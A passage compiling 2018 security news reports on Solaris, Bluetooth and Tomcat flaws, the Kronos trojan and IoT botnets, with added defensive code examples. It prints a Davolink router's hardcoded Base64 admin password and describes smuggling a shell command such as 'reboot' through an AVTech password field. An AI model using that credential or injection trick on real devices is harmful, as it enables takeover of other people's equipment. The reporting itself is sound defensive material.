The scale is very different. "While most companies have a maximum of a few hundred thousand employees," he continued, "one of our biggest clients has 50 million identities. Those people can access the client from anywhere on the planet, and they need the system to be up and running 24/7. For employee IAM, if the system is down for ten or 15 minutes (especially out of business hours) the impact is minimal. But in the case of cIAM even small downtimes can damage revenue and impact brand satisfaction."

These requirements, he suggests, demand a cloud-based solution. "With increasing customer experience expectations and growing cybersecurity threats, enterprises need a modern cloud-based identity platform that can be the foundation for digital transformation and provide peace of mind when it comes to security. This funding is a testament to LoginRadius' ability to deliver on this promise to our customers and sets the foundation for our future growth."

The firm already has offices in London, San Francisco, Sydney, and Jaipur; and plans to double its workforce over the next 12 months.

"Customer identity is at the intersection of security, digital business and compliance. This requires significant expertise to build and maintain in-house, resulting in extended go-to market time," said Deepak Gupta. "LoginRadius provides the answer to this critical challenge with its out-of-the-box solution."

The LoginRadius cloud platform is built with RESTful APIs and open sourced SDK libraries to allow developers to implement authentication, login interfaces and web SSO without worrying about back-end capabilities such as data management, disaster recovery, performance, system availability and scalability. It already serves more than 700 million identities, and handles 7.5 billion API calls per month.

"Forward-thinking companies are looking for secure, cloud-based identity solutions that can serve a global customer base and handle complex scenarios," commented Nagraj Kashyap, corporate vice president at Microsoft and global head of M12. LoginRadius is "delivering on their promise to simplify customer identity management, which allows enterprise companies to more easily achieve their digital transformation ambitions."


Researchers Resurrect Decade-Old Oracle Solaris Vulnerability
26.7.2018 securityweek
Vulnerability

One of the Solaris vulnerabilities patched by Oracle with its July 2018 Critical Patch Update (CPU) exists due to an ineffective fix implemented by the company for a flaw first discovered in 2007.

The new vulnerability, identified by researchers at Trustwave and tracked as CVE-2018-2892, impacts the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The security hole has been classified as high severity due to the fact that it allows an attacker to execute code with elevated privileges, but it cannot be exploited remotely without authentication.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation,” Trustwave wrote in an advisory. “The issue is the result of a signedness bug in the bounds checking of the 'SDBC_TEST_INIT' ioctl code sent to the '/dev/sdbc' device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

According to Trustwave, the vulnerability was originally discovered back in 2007 and its details were disclosed in 2009 at the CanSecWest security conference. The root cause of the issue is a combination of several arbitrary memory dereference bugs and an unbounded memory write bug.
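To make the bug class concrete, the following added example (hypothetical names; not Trustwave's, Oracle's or the Solaris driver's code) models a length check written against a signed C `int` using Python's ctypes: a negative length passes the check, and the same value turns into a huge `size_t` by the time a copy routine such as copyin() receives it. `MAX_TEST_LEN` and the function names are assumptions for the illustration.

```python
"""Added example: a signedness bug in an ioctl length check, modelled with C integer widths.
Hypothetical names; not the Solaris AVS driver's code. ctypes reproduces C's two's-complement
`int` and the implicit int -> size_t conversion a call like copyin(src, dst, len) performs."""
import ctypes
from typing import Callable, Optional

MAX_TEST_LEN = 4096  # hypothetical maximum the driver intended to allow


def as_c_int(raw: int) -> int:
    """Reinterpret a 32-bit pattern supplied from user space as a C `int`."""
    return ctypes.c_int32(raw).value


def as_size_t(value: int, bits: int = 64) -> int:
    """Convert a C int to size_t: sign-extended on a 64-bit kernel, reinterpreted on 32-bit."""
    return ctypes.c_uint64(value).value if bits == 64 else ctypes.c_uint32(value).value


def buggy_bounds_check(raw_len: int) -> bool:
    """Models `if (len > MAX_TEST_LEN) return EINVAL;` with `int len`.
    Only the upper bound is checked and the comparison is signed, so any
    negative length (e.g. the raw pattern 0xFFFFFFFF, i.e. -1) is accepted."""
    return as_c_int(raw_len) <= MAX_TEST_LEN


def fixed_bounds_check(raw_len: int) -> bool:
    """Reject anything outside [0, MAX_TEST_LEN]. Equivalent C: take the length
    as an unsigned type, or check both bounds explicitly."""
    length = as_c_int(raw_len)
    return 0 <= length <= MAX_TEST_LEN


def copy_length_seen_by_kernel(raw_len: int, bits: int = 64) -> int:
    """Length the copy routine uses once the signed int is passed as size_t.
    On a 64-bit kernel -1 becomes 2**64 - 1; on a 32-bit kernel it was 2**32 - 1,
    which is the architectural difference the write-up mentions."""
    return as_size_t(as_c_int(raw_len), bits)


def ioctl_handler(raw_len: int,
                  check: Callable[[int], bool] = buggy_bounds_check) -> Optional[int]:
    """Return the byte count that would reach the copy routine, or None if the
    length check rejects it. Swap in fixed_bounds_check to see the negative
    length refused before any copy happens."""
    if not check(raw_len):
        return None
    return copy_length_seen_by_kernel(raw_len)


if __name__ == "__main__":
    user_len = 0xFFFFFFFF  # constructed user-supplied length: -1 as a C int
    print("buggy check accepts -1:", buggy_bounds_check(user_len))
    print("bytes copyin() would use:", ioctl_handler(user_len))
    print("fixed check result:", ioctl_handler(user_len, check=fixed_bounds_check))
```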

Oracle released a patch sometime after the vulnerability was disclosed, but Trustwave discovered that the fix had been ineffective.

Exploitation of CVE-2018-2892 is “almost identical” to the original flaw, the most significant difference being related to the change in architecture between the open source OpenSolaris running on a 32-bit system and Oracle Solaris 11 running on a 64-bit system. Oracle discontinued OpenSolaris after acquiring Sun Microsystems in 2010.

Researchers believe the new vulnerability may exist due to some code introduced for testing purposes.

Another vulnerability patched by Oracle with its latest CPU is CVE-2018-2893, a critical flaw that allows attackers to remotely take control of WebLogic Server systems. The security hole has already been exploited in the wild to deliver cryptocurrency miners, backdoors and other types of malware.


Kronos Banking Trojan Has Returned
26.7.2018 securityweek
Virus

The Kronos banking Trojan is showing renewed strength and has been very active over the past several months, Proofpoint security researchers warn.

Kronos malware was first discovered in 2014 and maintained a steady presence on the threat landscape for a few years, before largely disappearing for a while. It uses man-in-the-browser (MiTB) attacks and webinjects to modify accessed web pages and steal user credentials, account information, and other data. It can also log keystrokes and has hidden VNC functionality.

Last year, the United States Federal Bureau of Investigation said that Kronos was built and distributed by British researcher Marcus Hutchins, who goes by the online handle of MalwareTech and who is known for stopping the WannaCry ransomware attack.

The new Kronos samples, which were observed in campaigns targeting users in Germany, Japan, and Poland, are connecting to a command and control (C&C) domain on the Tor network. There’s also speculation that the malware might have been rebranded to Osiris, but no hard evidence on this has emerged so far.

The first campaign carrying the new Kronos samples was observed on June 27, targeting German users with malicious documents attached to spam emails. The documents carried macros to download and execute the malware and the SmokeLoader Trojan downloader was used in some cases.

Targeting Japan, the second campaign was observed on July 13 and involved a malvertising chain. Malicious ads took users to a site where JavaScript injections redirected to the RIG exploit kit, which delivered SmokeLoader. The downloader would then drop Kronos onto the compromised machines.

The Poland campaign started on July 15 and involved fake invoice emails carrying malicious documents that attempted to exploit CVE-2017-11882 (the Equation Editor vulnerability) to download and execute Kronos.

The Kronos samples observed in all three campaigns were configured to use .onion domains for C&C purposes. The researchers also observed that webinjects were used in the German and Japanese campaigns, but none was seen in the attacks on Poland.

A fourth campaign observed on July 20 appeared to be work in progress. The Kronos samples were once again configured to use the Tor network and a test webinject was spotted.

The 2018 Kronos samples feature extensive code and string overlap with the older versions, abuse the same Windows API hashing technique and hashes, use the same string encryption technique and webinject format, and share the same C&C protocol and encryption mechanism.

The C&C panel file layout is also similar to the older variants and a self-identifying string is also present in the malware. The major change, however, is the use of .onion C&C URLs and the Tor network to anonymize communications.

There is also some evidence to suggest that the malware might have been rebranded to Osiris (the Egyptian god of rebirth).

The new malware is being advertised on underground forums as packing capabilities that overlap with those observed in the new version of Kronos and as having about the same size (350 KB), and the researchers also observed a file-naming scheme in Kronos that appears to suggest a connection with Osiris.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape. […] While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,” Proofpoint concludes.


Twitter Curbs Access for 143,000 Apps in New Crackdown
26.7.2018 securityweek
Social

Twitter said Tuesday it had removed more than 143,000 apps from the messaging service since April in a fresh crackdown on "malicious" activity from automated accounts.

The San Francisco-based social network said it was tightening access to its application programming interfaces (APIs) that allow developers to make automated Twitter posts.

"We're committed to providing access to our platform to developers whose products and services make Twitter a better place," said Twitter senior product management director Rob Johnson.

"However, recognizing the challenges facing Twitter and the public -- from spam and malicious automation to surveillance and invasions of privacy -- we're taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter."

Johnson offered no details on the revoked apps, but Twitter has been under pressure over automated accounts or "bots" which spread misinformation or falsely amplify a person or political cause.

"We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter," he said.

"We're continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently."

As of Tuesday, any developer seeking access to create a Twitter app will have to go through a new application process, providing details of how they will use the service.

"We're committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service," Johnson said.

Automated accounts are not always malicious -- some are designed to tweet out emergency alerts, art exhibits or the release of a Netflix program -- but "bots" have been blamed for spreading hoaxes and misinformation in a bid to manipulate public opinion.


Chrome Now Marks HTTP Sites as "Not Secure"
26.7.2018 securityweek Security

The latest version of Google's Chrome web browser (Chrome 68) represents another step the search giant is making toward a more secure web: the browser now marks HTTP sites as “Not Secure.”

The change comes three and a half years after the Chrome Security Team launched the proposal to mark all HTTP sites as affirmatively non-secure, so as to make it clearer for users that HTTP provides no data security.

When websites are loaded over HTTP, the connection is not encrypted, meaning not only that attackers on the network can access the transmitted information, but also that they can modify the contents of sites before they are served to the user.

HTTPS, on the other hand, encrypts the connection, meaning that eavesdroppers can’t access the transmitted data and that users’ information remains private.

Google, which has long been advocating the adoption of HTTPS across the web, is only marking HTTP pages with a gray warning in Chrome. Later this year, however, the browser will display a red “Not Secure” alert for HTTP pages that require users to enter data.

The goal, however, is to incentivize site owners to adopt HTTPS. For that, Google is also planning on removing the (green) “Secure” wording and HTTPS scheme from Chrome in September 2018.

This means that the browser will no longer display positive security indicators, but will warn on insecure connections. Starting May 1, Chrome is also warning when encountering certificates that are not compliant with the Chromium Certificate Transparency (CT) Policy.

“To ensure that the Not Secure warning is not displayed for your pages in Chrome 68, we recommend migrating your site to HTTPS,” Google tells website admins.

According to Google’s Transparency Report, HTTPS usage has increased considerably worldwide, across all platforms: over 75% of pages are served over an encrypted connection on Chrome OS, macOS, Android, and Windows. The same applies to 66% of pages served to Linux users.

To help site admins move to HTTPS, the Internet giant has published a migration guide that includes recommendations and which also addresses common migration concerns such as SEO, ad revenue and performance impact.

In addition to marking HTTP sites as Not Secure, Chrome 68 includes patches for a total of 42 vulnerabilities, 29 of which were reported by external researchers: 5 High severity flaws, 19 Medium risk bugs, and 5 Low severity issues.

The 5 High risk issues include a stack buffer overflow in Skia, a heap buffer overflow in WebGL, a use after free in WebRTC, a heap buffer overflow in WebRTC, and a type confusion in WebRTC.

The remaining flaws included use after free, same origin policy bypass, heap buffer overflow, URL spoof, CORS bypass, permissions bypass, type confusion, integer overflow, local user privilege escalation, cross origin information leak, UI spoof, local file information leak, request privilege escalation, and cross origin information leak.


Car Sharing Apps Vulnerable to Hacker Attacks: Kaspersky
26.7.2018 securityweek
Vulnerability

Researchers at Kaspersky Lab have analyzed over a dozen mobile applications provided by car sharing companies and discovered serious security holes that can be exploited to obtain personal information and even steal vehicles.

The security firm’s employees have investigated a total of 13 car sharing apps for Android. The targeted applications are used in the U.S., Europe and Russia, and they have been downloaded more than 1 million times from Google Play.

Car sharing applications can be a tempting target for malicious actors for several reasons. They could hijack the legitimate user’s account in order to drive cars without actually paying for them, steal vehicles for their parts or to commit crimes, track users’ locations, and obtain the account holder’s personal information.

While some of these are theoretical risks, Kaspersky pointed out that cybercriminals are already selling hijacked car sharing accounts. The sellers claim these accounts can be useful for several things, including for driving a car without a license.

Researchers first checked to see if the applications can be reverse engineered and if they can be executed with root privileges. Failure to prevent unauthorized individuals from reverse engineering an application increases the risk of someone creating a malicious version of the app. Allowing an app to run on a rooted device enables an attacker to access sensitive information.

Only one of the apps had reverse engineering protections in place, but it did not prevent execution on a rooted device. On the other hand, the app in question did encrypt sensitive data, which mitigates the risk introduced by allowing it to run with elevated privileges.

Kaspersky also verified the strength of the passwords protecting car sharing accounts. Experts found that in many cases developers set weak passwords or provide users short one-time verification codes. This, combined with the lack of a limitation mechanism for the number of login attempts, makes it easier to launch brute-force attacks and obtain a password or one-time code.

Brute force attack on car sharing app

The users of car sharing apps can often be identified on social media – it’s not uncommon for them to post pictures while driving and use a specific hashtag – and they often unwittingly expose their phone number on these websites.

Phone numbers are important for attackers as this piece of information can represent the username and it’s where the car sharing company sends one-time passwords.

Researchers also noticed that while the applications use HTTPS for communications with the server, they all fail to check the server’s certificate, making it easier to launch man-in-the-middle (MitM) attacks and intercept potentially sensitive data.

Finally, experts checked if the apps include any overlay protections. Specifically, they verified if developers implemented any mechanisms that would prevent attackers who already have access to a smartphone from showing a fake window (i.e. a phishing page) on top of the legitimate car sharing application. Unfortunately, none of the tested apps protect users against this threat.

Kaspersky has not named any of the tested applications, but did point out that the ones made by companies in the U.S. and Europe are more secure than those of Russian firms.

“Our research concluded that, in their current state, applications for car sharing services are not ready to withstand malware attacks,” explained Victor Chebyshev, security expert at Kaspersky Lab. “While we have not yet detected any cases of sophisticated attacks against car sharing services, cybercriminals understand the value that such apps hold, and existing offers on the black market point to the fact that vendors do not have much time to remove the vulnerabilities.”


Big Tech Firms Agree on 'Data Portability' Plan
26.7.2018 securityweek IT

Facebook, Google, Microsoft and Twitter unveiled plans Friday to make it easier for users to take their personal data and leave one online service for another.

The "Data Transfer Project" revealed by the companies responds to concerns about the growing influence of internet platforms and internet user concerns about control of their personal information shared online.

"Users should be in control of their data on the web; part of this is the ability to move their data," the companies said on the project website.

Data portability has been a goal of many privacy activists, and is enshrined in some country regulations including Europe's new General Data Protection Regulation.

Currently, people can download their data from an online service, without a guarantee it will be possible or feasible to upload the information to a new service.

The situation can result in people feeling anchored to a service or app, even if they are unhappy with it or an enticing option arises, because of photos, contacts, posts and other accumulated data.

"Making it easier for individuals to choose among services facilitates competition, empowers individuals to try new services and enables them to choose the offering that best suits their needs," the project said at its website.

"There are many use cases for users porting data directly between services, some we know about today, and some we have yet to discover."

Reasons for shifting personal data could include abandoning an old service, trying a new one, or simply backing up information to keep it safe.

The project was formed two years ago and remains in a development phase.

Disclosure of the effort comes amid heightened scrutiny over the potential of internet companies to abuse positions of power and the right of people to control their online data.


Hide ‘N Seek botnet also includes exploits for home automation systems
25.7.2018 securityaffairs
Vulnerability

Security experts from Fortinet have discovered that the Hide ‘N Seek botnet is now targeting vulnerabilities in home automation systems.
The Hide ‘N Seek botnet was first spotted on January 10th when it was targeting home routers and IP cameras.

It was first spotted on January 10th by malware researchers from Bitdefender, then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices in less than a week.

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnet; unlike Mirai, Hajime doesn’t use C&C servers and instead implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

In May the botnet infected over 90,000 unique devices; more recently, researchers from Qihoo 360’s NetLab discovered the bot was also targeting AVTECH webcams, Cisco Linksys routers, and OrientDB and CouchDB database servers.

Hide ‘N Seek timeline

Fortinet experts have compared three different versions of the bot over time.

The security firm reports that the latest version of the bot has a configuration made up of 110 entries and 9 exploits.

“We can easily spot the difference between them simply by the number of entries each one has. We are particularly interested in the exploits that each version is using.” states Fortinet.

“The first variant, as shown below, has a configuration made up of 60 entries that includes 2 exploits, the second has 81 entries and 6 exploits, while the most recent now has 110 entries and 9 exploits.”

Hide ‘N Seek authors recently included an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability; the malicious code allows the botnet to target devices in smart homes controlled by the HomeMatic central unit.

The bot also includes the exploit for an RCE issue in the Belkin NetCam devices.

The experts believe the author of the Hide ‘N Seek botnet will continue to improve the bot by adding new exploits to target a broad range of devices.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand its usage of publicly available exploits.

“HNS has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet concludes.

“With this new understanding of this malware’s recent behaviour we expect the next alterations to include more functions as well as the usage of publicly available exploits.”


CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic
25.7.2018 securityaffairs
Vulnerability

Security researchers have found a high severity flaw (CVE-2018-5383) affecting some Bluetooth implementations that allow attackers to manipulate traffic.
Security researchers at the Israel Institute of Technology have found a high severity vulnerability affecting some Bluetooth implementations that could be exploited by an unauthenticated remote attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.

The issue, tracked as CVE-2018-5383, affects the Secure Simple Pairing and LE Secure Connections features; it affects firmware or drivers from some major vendors including Apple, Broadcom, Intel, and Qualcomm.

The Bluetooth specifications recommend that devices supporting the above features validate the public key exchanged during the pairing process.

Experts from Bluetooth Special Interest Group (SIG), the group that oversees the development of Bluetooth standards, explained that some vendors do not implement public key validation.

Basically, a nearby attacker can launch a man-in-the-middle (MitM) attack and obtain the encryption key, then monitor and manipulate the traffic exchanged by the devices.

“For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure.” reads the advisory published by the Bluetooth SIG.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful.”

CVE-2018-5383 Bluetooth

The Bluetooth SIG has addressed the vulnerability by updating the specification; it is now mandatory for products to implement public key validation during the pairing process.

Moreover, the Bluetooth SIG has also added testing for this vulnerability within its Bluetooth Qualification Process.

The CERT/CC published a security advisory on the flaw that includes technical details.

“Bluetooth firmware or operating system software drivers may not sufficiently validate elliptic curve parameters used to generate public keys during a Diffie-Hellman key exchange, which may allow a remote attacker to obtain the encryption key used by the device.” reads the advisory published by the CERT/CC.
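To show what the now-mandatory public key validation actually checks, here is an added example (not the Bluetooth SIG's, CERT/CC's or any vendor's code): a pure-Python toy ECDH over NIST P-256, the curve used by LE Secure Connections, that refuses to derive a shared key from a received point that is the identity, has out-of-range coordinates, or does not lie on the curve. The private scalars and the malformed peer point are constructed values for the demonstration.

```python
"""Added example: validating a peer's ECDH public key before deriving the pairing key.
Pure-Python toy ECDH over NIST P-256; not the Bluetooth SIG's or any vendor's code.
Private scalars and the malformed peer point below are constructed for the demo."""

# NIST P-256 domain parameters for y^2 = x^3 + A*x + B (mod P)
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
G = (GX, GY)
INFINITY = None  # point at infinity, the group identity


def is_on_curve(x: int, y: int) -> bool:
    """True iff (x, y) satisfies the P-256 curve equation."""
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine group law on the curve; handles the identity and doubling."""
    if p1 is INFINITY:
        return p2
    if p2 is INFINITY:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INFINITY  # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k: int, point):
    """Double-and-add k*point (not constant-time; fine for an illustration)."""
    result = INFINITY
    addend = point
    while k > 0:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def validate_public_key(point) -> bool:
    """The check the affected CVE-2018-5383 implementations skipped: reject the
    identity, out-of-range coordinates, and any point not on the curve. P-256 has
    cofactor 1, so an on-curve point is automatically in the prime-order group."""
    if point is INFINITY:
        return False
    x, y = point
    if not (0 <= x < P and 0 <= y < P):
        return False
    return is_on_curve(x, y)


def ecdh_shared_secret(private_scalar: int, peer_public) -> int:
    """Derive the DH shared secret (x-coordinate) only after validating the peer's key."""
    if not validate_public_key(peer_public):
        raise ValueError("peer public key rejected: not a valid P-256 point")
    shared = scalar_mult(private_scalar, peer_public)
    return shared[0]


# Constructed private scalars for the two pairing devices (both below N).
ALICE_PRIV = 0x1e4c2a7d9b3f6e8150c7a2d4f6b8e0d2a4c6e8f0b2d4f6a8c0e2f4a6b8d0e2f4
BOB_PRIV = 0x7a3b5c9d1e2f4a6b8c0d2e4f6a8b0c2d4e6f8a0b2c4d6e8f0a2b4c6d8e0f2a4c


def pairing_demo():
    """Returns (both sides agree on the key, malformed point accepted)."""
    alice_pub = scalar_mult(ALICE_PRIV, G)
    bob_pub = scalar_mult(BOB_PRIV, G)
    k_a = ecdh_shared_secret(ALICE_PRIV, bob_pub)
    k_b = ecdh_shared_secret(BOB_PRIV, alice_pub)
    # A constructed malformed peer point: the generator's x, but y nudged off the curve.
    bogus = (GX, (GY + 1) % P)
    return k_a == k_b, validate_public_key(bogus)


if __name__ == "__main__":
    print(pairing_demo())  # (True, False)
```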

According to the Bluetooth SIG, there is no evidence that the CVE-2018-5383 flaw has been exploited in attacks in the wild.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” added the Bluetooth SIG.

Both Apple and Intel have rolled out security patches to address the CVE-2018-5383 vulnerability.

According to Intel, the vulnerability affects the Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families.

The vendor has already rolled out both software and firmware updates to fix the issue.

According to Broadcom, some of its products supporting Bluetooth 2.1 or newer technology may be impacted; the company added that security fixes were already provided to OEM customers.


Apache Software Foundation fixes important flaws in Apache Tomcat
25.7.2018 securityaffairs
Vulnerability

The Apache Software Foundation has rolled out security updates for the Tomcat application server that address several flaws.
The Apache Software Foundation has released security updates for the Tomcat application server that address several vulnerabilities, including issues that trigger a denial-of-service (DoS) condition or can lead to information disclosure.

Apache Tomcat is an open-source Java Servlet Container that implements several Java EE specifications including Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket, and provides a “pure Java” HTTP web server environment in which Java code can run.

It has been estimated that Tomcat has a market share of over 60 percent.

The first flaw addressed by the Apache Software Foundation is CVE-2018-8037, an important bug in the tracking of connection closures that can lead to the reuse of user sessions in a new connection.

The flaw affects Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. The Tomcat 9.0.10 and 8.5.32 releases address the vulnerability.

Another important issue addressed by the Foundation is CVE-2018-1336: improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder, triggering a denial-of-service condition.

The vulnerability affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x.

Versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90 address the vulnerability.

The Apache Software Foundation also fixed a low severity security constraints bypass tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the security advisory.

The vulnerability has been addressed with the release of the latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x versions.

The US-CERT has released a security alert that urges users to apply security updates.

“The Apache Software Foundation has released security updates to address vulnerabilities in Apache Tomcat versions 9.0.0.M9 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.” reads the security advisory published by the US-CERT.

“NCCIC encourages users and administrators to review the Apache security advisories for CVE-2018-8037 and CVE-2018-1336 and apply the necessary updates.”

Apache Tomcat vulnerabilities are less likely to be exploited in the wild.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution.


The Death botnet grows targeting AVTech devices with a 2-year-old exploit
25.7.2018 securityaffairs BotNet

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.
A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape; its author, who goes online by the moniker EliteLands, is gathering unpatched AVTech devices into the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers and the largest publicly listed company in the Taiwan surveillance industry.

EliteLands is using a 2-year-old exploit that could be used to trigger tens of well-known vulnerabilities in the AVTech firmware. Many of the vendor’s products currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav who discovered the Death botnet revealed that outdated firmware versions expose the passwords of the AVTech device in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability in the password field, meaning that an attacker can supply a shell command in this field to have it executed and take over the device.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, the Hide ‘N Seek (HNS) botnet, started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands is gathering devices for his Death botnet by targeting exposed devices with different payloads for the password field.

The latest version of the payload used by EliteLands adds accounts with a lifespan of five minutes that execute his payload and are then deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted EliteLands, who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet’s purpose was originally just to ddos but I have a greater plan on it soon. I don’t really use it for attacks, only to get customers aware of the power it has.”


Korean Davolink routers are easily exploitable due to poor cyber hygiene
25.7.2018 securityaffairs
Exploit

Davolink dvw 3200 routers have their login portal up on port 88; access is password protected, but the password is hardcoded in the HTML of the login page.
The story started in 2018 when Anubhav noticed a very basic flaw in the routers of the Korean vendor Davolink.

These Davolink dvw 3200 routers have their login portal up on port 88, and access is password protected.

Analyzing the code of the page, the expert noticed a function named “clickApply” that included the password in standard Base64 encoding.

// Fragment of the login page script as found on the device: the credential is
// embedded client-side as a Base64 string, i.e. a hardcoded password.
function clickApply(sel)
{
    var user_passwd="YWRtaW4=";
    var super_passwd="(null)";
    // encode() is defined elsewhere in the page; the fragment ends here.
    document.forms[0].http_passwd.value = encode(document.forms[0].tmp_http_passwd.value);
}

Scanning the Internet for similar devices using the search engine ZoomEye, he discovered that more than 50 routers in Korea are exposed online and accessible using the hardcoded password.
The expert reported the issue to the vendor, which quickly acknowledged it and responded that it has discontinued the product. The vendor added that a working patch is already available.

The expert published the exploit code on exploit-db.

“Many IoT vendors are not doing the basics right, as keeping the password in the HTML source is a very basic security issue,” concluded Anubhav, “and it is a relevant issue as users in Korea are using it.”


Gigamon Acquires Network Visibility Startup ICEBRG

24.7.2018 securityweek IT

Network traffic analysis firm Gigamon on Tuesday announced plans to acquire network security startup ICEBRG.

Founded in 2014, Seattle, Washington-based ICEBRG provides a Security-as-a-Service (SaaS) solution designed to help organizations detect threats and gain and leverage network visibility for security operations.

Gigamon's flagship GigaSECURE platform provides visibility into network traffic, users, applications and suspicious activity.

The ICEBRG platform uses sensors deployed at customer locations that stream network traffic metadata to a cloud-based system that helps Security Operations Center (SOC) teams quickly identify threats and act to remediate them.

Gigamon says it will combine the two platforms to help enterprises leverage various security tools.

“The combination of the high-quality network data from the GigaSECURE Security Delivery Platform and the ICEBRG cloud-based platform will power the next generation of security capabilities. Together, our expertise in networking and security will help SOC teams focus on defending against the most severe threats in their environments,” William Peteroy, co-founder and CEO of ICEBRG, said.

The terms of the deal were not disclosed.


Data Leak at Robotics Firm Exposes Global Manufacturers
24.7.2018 securityweek Incident

A publicly accessible server belonging to robotics vendor Level One Robotics and Controls, Inc. contained sensitive documents connected to more than one hundred manufacturing companies.

Established in 2000, the engineering service provider offers automation process and assembly for OEMs, Tier 1 automotive suppliers, and end users, delivering services such as project management, design, integration, debug, and training.

The exposed server was discovered by the UpGuard Cyber Risk team earlier this month. It contained 157 gigabytes of data, including documents, schematics, and other information belonging to the provider’s customers and employees.

The exposed data included “over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements,” the security firm reveals.

Specifications and use of the machines, as well as animations of the robots at work, customer contact details, and ID badge request forms were also found on the server.

Level One customers impacted by the data exposure include divisions of VW, Chrysler, Ford, Toyota, GM, Tesla and ThyssenKrupp.

The server also contained data belonging to the organization’s employees, such as scans of driver’s licenses, passports and other identification. Level One business data was also exposed, including invoices, prices, contracts, typical business documents, and bank account details (including account and routing numbers, and SWIFT codes).

“The sheer amount of sensitive data and the number of affected businesses illustrate how third and fourth-party supply chain cyber risk can affect even the largest companies,” the security firm notes.

UpGuard says the data was exposed via rsync, the file transfer protocol commonly used for large data transfers. The researchers discovered that access to the server wasn’t restricted by IP or user and that the data was downloadable to any rsync client that connected to the rsync port.
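As an added illustration (not UpGuard's or Level One's configuration), a small Python audit of an rsyncd.conf that flags the two gaps described above, a module with no source-address restriction and no user authentication, shown against a hardened variant. Both configuration texts are constructed samples, and the parser handles only the directives it checks.

```python
"""Added example, not UpGuard's or Level One's configuration: audit an
rsyncd.conf for modules reachable from any IP without authentication, the
exposure pattern described in the article."""
import re
from typing import Dict, List

# Constructed sample: a daemon module exposing a data directory with no
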